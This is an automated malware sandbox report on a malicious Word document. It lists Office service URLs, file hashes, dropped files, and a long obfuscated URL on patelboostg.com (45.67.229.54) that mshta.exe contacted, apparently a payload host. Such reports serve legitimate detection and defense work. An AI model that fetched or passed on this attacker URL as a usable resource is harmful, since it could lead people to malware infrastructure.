https://ofcrecsvcapi-int.azurewebsites.net/0%URL Reputationsafe
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h0%Avira URL Cloudsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://api.aadrm.com0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://asgsmsproxyapi.azurewebsites.net/0%URL Reputationsafe
http://patelboostg.com/frhe/L8dclCye7SQ5WTFva78FDxOjGBOF9iJro4DRgV/5inYIaSBt0KLfMB9kXwZBv6ZpTsny6/qAhIQjrAaLKJeTLQnbCarASpMADNe9u19Kylnkoreo7/SjqMh4eEx0Hx9b4h5e2fMcQgeIbFT/kKeSzfUaenwSFB/ISkVIHedx0p/49280/SruwcI68Yb5pVaVqfvyOHztDsbEuhGxtlV6bpgPIFvGFQ277/7FkN9pAcaWDfFlGNBeuaqGed8iDibaWexT/GyAAzLRbFAU1XErrU1F/vaci3?page=V8BBaQuem65&page=XYvyd0Dcrg6fJYLGHRVWp7s1tv&page=dvZwXcjcYCjBX8tPaALshiDAx85PEq&sid=10tOgWzOZj9xyAidNJAz3d9Ob04%VirustotalBrowse
http://patelboostg.com/frhe/L8dclCye7SQ5WTFva78FDxOjGBOF9iJro4DRgV/5inYIaSBt0KLfMB9kXwZBv6ZpTsny6/qAhIQjrAaLKJeTLQnbCarASpMADNe9u19Kylnkoreo7/SjqMh4eEx0Hx9b4h5e2fMcQgeIbFT/kKeSzfUaenwSFB/ISkVIHedx0p/49280/SruwcI68Yb5pVaVqfvyOHztDsbEuhGxtlV6bpgPIFvGFQ277/7FkN9pAcaWDfFlGNBeuaqGed8iDibaWexT/GyAAzLRbFAU1XErrU1F/vaci3?page=V8BBaQuem65&page=XYvyd0Dcrg6fJYLGHRVWp7s1tv&page=dvZwXcjcYCjBX8tPaALshiDAx85PEq&sid=10tOgWzOZj9xyAidNJAz3d9Ob00%Avira URL Cloudsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
patelboostg.com
45.67.229.54
truefalseunknown

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://patelboostg.com/frhe/L8dclCye7SQ5WTFva78FDxOjGBOF9iJro4DRgV/5inYIaSBt0KLfMB9kXwZBv6ZpTsny6/qAhIQjrAaLKJeTLQnbCarASpMADNe9u19Kylnkoreo7/SjqMh4eEx0Hx9b4h5e2fMcQgeIbFT/kKeSzfUaenwSFB/ISkVIHedx0p/49280/SruwcI68Yb5pVaVqfvyOHztDsbEuhGxtlV6bpgPIFvGFQ277/7FkN9pAcaWDfFlGNBeuaqGed8iDibaWexT/GyAAzLRbFAU1XErrU1F/vaci3?page=V8BBaQuem65&page=XYvyd0Dcrg6fJYLGHRVWp7s1tv&page=dvZwXcjcYCjBX8tPaALshiDAx85PEq&sid=10tOgWzOZj9xyAidNJAz3d9Ob0false
  • 4%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://api.diagnosticssdf.office.com4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
    high
    https://login.microsoftonline.com/4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
      high
      https://shell.suite.office.com:14434BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
        high
        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
          high
          https://autodiscover-s.outlook.com/4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
            high
            https://roaming.edog.4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
            • URL Reputation: safe
            unknown
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
              high
              https://cdn.entity.4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
              • URL Reputation: safe
              unknown
              https://api.addins.omex.office.net/appinfo/query4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                high
                https://clients.config.office.net/user/v1.0/tenantassociationkey4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                  high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                    high
                    https://powerlift.acompli.net4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                    • URL Reputation: safe
                    unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.com4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                    • URL Reputation: safe
                    unknown
                    https://lookup.onenote.com/lookup/geolocation/v14BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                      high
                      https://cortana.ai4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                      • URL Reputation: safe
                      unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                        high
                        https://cloudfiles.onenote.com/upload.aspx4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                          high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                            high
                            https://entitlement.diagnosticssdf.office.com4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                              high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                high
                                https://api.aadrm.com/4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                • URL Reputation: safe
                                unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                • URL Reputation: safe
                                unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                  high
                                  https://api.microsoftstream.com/api/4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                    high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                      high
                                      https://cr.office.com4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                        high
                                        https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                        • Avira URL Cloud: safe
                                        low
                                        https://portal.office.com/account/?ref=ClientMeControl4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                          high
                                          https://graph.ppe.windows.net4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                            high
                                            https://res.getmicrosoftkey.com/api/redemptionevents4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://powerlift-frontdesk.acompli.net4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://tasks.office.com4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                              high
                                              https://officeci.azurewebsites.net/api/4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://sr.outlook.office.net/ws/speech/recognize/assistant/work4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                high
                                                https://store.office.cn/addinstemplate4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://api.aadrm.com4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://outlook.office.com/autosuggest/api/v1/init?cvid=4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                  high
                                                  https://globaldisco.crm.dynamics.com4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                    high
                                                    https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                      high
                                                      https://dev0-api.acompli.net/autodetect4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://www.odwebp.svc.ms4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://api.powerbi.com/v1.0/myorg/groups4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                        high
                                                        https://web.microsoftstream.com/video/4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                          high
                                                          https://api.addins.store.officeppe.com/addinstemplate4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://graph.windows.net4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                            high
                                                            https://dataservice.o365filtering.com/4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://officesetup.getmicrosoftkey.com4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://analysis.windows.net/powerbi/api4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                              high
                                                              https://prod-global-autodetect.acompli.net/autodetect4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://outlook.office365.com/autodiscover/autodiscover.json4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                                high
                                                                https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                                  high
                                                                  https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                                    high
                                                                    https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                                      high
                                                                      https://ncus.contentsync.4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                                        high
                                                                        https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                                          high
                                                                          http://weather.service.msn.com/data.aspx4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                                            high
                                                                            https://apis.live.net/v5.0/4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                                              high
                                                                              https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                                                high
                                                                                https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                                                  high
                                                                                  https://management.azure.com4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                                                    high
                                                                                    https://outlook.office365.com4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                                                      high
                                                                                      https://wus2.contentsync.4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://incidents.diagnostics.office.com4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                                                        high
                                                                                        https://clients.config.office.net/user/v1.0/ios4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                                                          high
                                                                                          https://insertmedia.bing.office.net/odc/insertmedia4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                                                            high
                                                                                            https://o365auditrealtimeingestion.manage.office.com4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                                                              high
                                                                                              https://outlook.office365.com/api/v1.0/me/Activities4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                                                                high
                                                                                                https://api.office.net4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                                                                  high
                                                                                                  https://incidents.diagnosticssdf.office.com4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                                                                    high
                                                                                                    https://asgsmsproxyapi.azurewebsites.net/4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    https://clients.config.office.net/user/v1.0/android/policies4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                                                                      high
                                                                                                      https://entitlement.diagnostics.office.com4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                                                                        high
                                                                                                        https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                                                                          high
                                                                                                          https://substrate.office.com/search/api/v2/init4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                                                                            high
                                                                                                            https://outlook.office.com/4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                                                                              high
                                                                                                              https://storage.live.com/clientlogs/uploadlocation4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                                                                                high
                                                                                                                https://outlook.office365.com/4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                                                                                  high
                                                                                                                  https://webshell.suite.office.com4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                                                                                    high
                                                                                                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                                                                                      high
                                                                                                                      https://substrate.office.com/search/api/v1/SearchHistory4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                                                                                        high
                                                                                                                        https://management.azure.com/4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                                                                                          high
                                                                                                                          https://login.windows.net/common/oauth2/authorize4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                                                                                            high
                                                                                                                            https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            https://graph.windows.net/4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                                                                                              high
                                                                                                                              https://api.powerbi.com/beta/myorg/imports4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                                                                                                high
                                                                                                                                https://devnull.onenote.com4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                                                                                                  high
                                                                                                                                  https://ncus.pagecontentsync.4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                                                                                                    high
                                                                                                                                    https://messaging.office.com/4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                                                                                                      high
                                                                                                                                      https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                                                                                                        high
                                                                                                                                        https://augloop.office.com/v24BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                                                                                                          high
                                                                                                                                          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                                                                                                            high
                                                                                                                                            https://skyapi.live.net/Activity/4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://clients.config.office.net/user/v1.0/mac4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                                                                                                              high
                                                                                                                                              https://dataservice.o365filtering.com4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://api.cortana.ai4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://onedrive.live.com4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA.1.drfalse
                                                                                                                                                high

                                                                                                                                                Contacted IPs

                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                Public

                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                45.67.229.54
                                                                                                                                                patelboostg.comMoldova Republic of
                                                                                                                                                200019ALEXHOSTMDfalse

                                                                                                                                                General Information

                                                                                                                                                Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                                Analysis ID:546767
                                                                                                                                                Start date:31.12.2021
                                                                                                                                                Start time:12:35:14
                                                                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                                                                Overall analysis duration:0h 12m 1s
                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                Report type:light
                                                                                                                                                Sample file name:enjoin,12.27.2021.doc
                                                                                                                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                Run name:Potential for more IOCs and behavior
                                                                                                                                                Number of analysed new started processes analysed:41
                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                Technologies:
                                                                                                                                                • HCA enabled
                                                                                                                                                • EGA enabled
                                                                                                                                                • HDC enabled
                                                                                                                                                • GSI enabled (VBA)
                                                                                                                                                • AMSI enabled
                                                                                                                                                Analysis Mode:default
                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                Detection:MAL
                                                                                                                                                Classification:mal96.expl.evad.winDOC@8/15@1/1
                                                                                                                                                EGA Information:Failed
                                                                                                                                                HDC Information:Failed
                                                                                                                                                HCA Information:
                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                • Number of executed functions: 0
                                                                                                                                                • Number of non-executed functions: 0
                                                                                                                                                Cookbook Comments:
                                                                                                                                                • Adjust boot time
                                                                                                                                                • Enable AMSI
                                                                                                                                                • Found application associated with file extension: .doc
                                                                                                                                                Warnings:
                                                                                                                                                Show All
                                                                                                                                                • Max analysis timeout: 600s exceeded, the analysis took too long
                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, taskhostw.exe, RuntimeBroker.exe, Microsoft.Photos.exe, backgroundTaskHost.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, MusNotifyIcon.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                • Excluded IPs from analysis (whitelisted): 52.109.88.177, 52.109.76.35, 52.109.76.36
                                                                                                                                                • Excluded domains from analysis (whitelisted): www.bing.com, prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, settings-win.data.microsoft.com, arc.msn.com, ris.api.iris.microsoft.com, login.live.com, config.officeapps.live.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                Simulations

                                                                                                                                                Behavior and APIs

                                                                                                                                                No simulations

                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                IPs

                                                                                                                                                No context

                                                                                                                                                Domains

                                                                                                                                                No context

                                                                                                                                                ASN

                                                                                                                                                No context

                                                                                                                                                JA3 Fingerprints

                                                                                                                                                No context

                                                                                                                                                Dropped Files

                                                                                                                                                No context

                                                                                                                                                Created / dropped Files

                                                                                                                                                C:\Users\Public\gigabyteI7.jpg
                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                File Type:HTML document, ASCII text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):204
                                                                                                                                                Entropy (8bit):5.1573981743615605
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3fEjZKCezocKqD:J0+oxBeRmR9etdzRxfERez1T
                                                                                                                                                MD5:D3EB9513A9F2DD24ECDCC38FF33CA41B
                                                                                                                                                SHA1:37433C7BFDB800C601FCBA6F055BD01A87D26333
                                                                                                                                                SHA-256:56591A120BD1C7D012554BEFD923D1AC7BF015A53A36C2808766F74FBFDCEB64
                                                                                                                                                SHA-512:67960FEEC5EDA119383B9955DBD36550CE804EF1FD01F0E4D9AFC347068CA54BE4B89913AF2CC872E25C119318CBE3E137A4965E4A5A09231AFE960C1E2B844B
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL "vaci3" was not found on this server.</p>.</body></html>.
                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\4BD40E7D-30A8-47CA-8B70-A71BF56BA8FA
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):140624
                                                                                                                                                Entropy (8bit):5.356666054990061
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:0cQIfgxrBdA3guwtnQ9DQW+zUk4F77nXmvid1XPE6LWmE9:45Q9DQW+zAX8H
                                                                                                                                                MD5:EB7748E99C9B6BC3B318A96105271CFE
                                                                                                                                                SHA1:9465067296CF28FACC9327486ED59A2A8D4D7E51
                                                                                                                                                SHA-256:7DBBC6C4044C0D674F296163FD09F5CE6E8C8108F6B484D5533EC665B2684517
                                                                                                                                                SHA-512:25E13FED0AD659CE69A1211E70B6F98AD80E510901134B4F9FE59F79F353CEE79CAB1FF114D521260A6489375011717197E54209948D5F44ED9D6D78DB6B4B43
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-12-31T11:36:08">.. Build: 16.0.14812.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRF{810769F3-F410-47AD-894E-8C41E68C70EA}.tmp
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):16384
                                                                                                                                                Entropy (8bit):3.6630558487594036
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:CtlT6D1V6cbDGWwf6g2lwnDYxvz9KN0jafYrXta:CtkD1Faf2gcl9KN0jawr
                                                                                                                                                MD5:391F336EB243CC44907089BF658F56FC
                                                                                                                                                SHA1:F9245089DEA0A39E3F41F8126816E358A85A6CC1
                                                                                                                                                SHA-256:4E5BDF93CB40BB4DFF008EAF50F190706875F6C3FDD311BD7840BB9686C1DE10
                                                                                                                                                SHA-512:477FDA0E67C9EEB0BCF0BB242FA4FA6FECABB0C40DC37E82F5BC3227C75E1B9E8AEBF4C6E1B6097EF6840C489E9D1BB284B6230AAB91C6D220B99D77C5FCCAD1
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{4FE388FF-4D0E-4364-853B-3527191878F8}.tmp
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1024
                                                                                                                                                Entropy (8bit):0.05390218305374581
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                                Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\vaci3[1].htm
                                                                                                                                                Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                File Type:HTML document, ASCII text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):204
                                                                                                                                                Entropy (8bit):5.1573981743615605
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3fEjZKCezocKqD:J0+oxBeRmR9etdzRxfERez1T
                                                                                                                                                MD5:D3EB9513A9F2DD24ECDCC38FF33CA41B
                                                                                                                                                SHA1:37433C7BFDB800C601FCBA6F055BD01A87D26333
                                                                                                                                                SHA-256:56591A120BD1C7D012554BEFD923D1AC7BF015A53A36C2808766F74FBFDCEB64
